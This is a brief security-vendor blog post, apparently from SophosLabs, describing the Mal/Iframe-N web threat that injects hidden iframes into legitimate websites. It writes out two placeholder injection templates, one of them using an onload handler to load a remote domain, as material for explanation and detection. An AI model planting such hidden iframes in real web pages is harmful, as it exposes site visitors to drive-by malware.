Mal/Iframe-N: The next big threat?

Since releasing detection for Mal/Iframe-N on Wednesday (21st Oct) SophosLabs have seen a rising number of detections. Detections are now into the thousands of websites affected by this threat. A couple of the sites hit are well known and one of them that I previously talked about as having been infected is the official Van Morisson site.

Even though this site is effectively down for improvement there is still an infection!

I thought that I would take some time explain a little more about this particular web threat.

What is so special about Mal/Iframe-N?

Normally, malicious Iframe’s have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isn’t a direct src= they use onload= like this:

<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these Iframes is currently appending them to the end of legitimate HTML.